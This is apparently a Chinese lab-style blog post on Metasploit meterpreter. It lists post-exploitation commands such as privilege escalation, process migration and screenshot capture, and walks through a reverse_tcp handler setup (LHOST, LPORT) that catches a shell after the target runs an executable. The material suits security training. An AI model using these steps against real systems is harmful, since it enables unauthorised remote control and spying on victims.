metasploit之meterpreter命令
metasploit之meterpreter命令
目的: 了解meterpreter命令
原理:
ps
查询当前目标机所有进程getpid
获取当前会话进程getuid
当前用户所用的权限,所在用户组sysinfo
取系统信息getsystem
提升至system最高权限shell
进入cmdshell命令模式pwd
查看当前所在位置cat
查看文本文件ipconfig
查看网络配置信息migrate pid
迁移pidscreenshot
截取当前用户屏幕保存到本地
过程:
打开终端,运行msf,use exploit/multi/handler
选择exploit,set payload windows/meterpreter/reverse_tcp
设置payload,set LHOST 192.168.1.2
设置监听主机,set LPORT 11101
设置端口
输入exploit -j
运行脚本,且在后台监听
靶机双击桌面运行xx.exe,返回kali,已经取得会话
敲击回车,返回msf,执行sessions
,查看会话,再执行sessions 1
,进入会话
执行ps
查看进程
getuid
查看权限
pwd
查看当前路径
screentshot
截图
background
会话转入后台
新建终端,进入/root目录下,查看截图
实验结束
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 0xchang's Blog!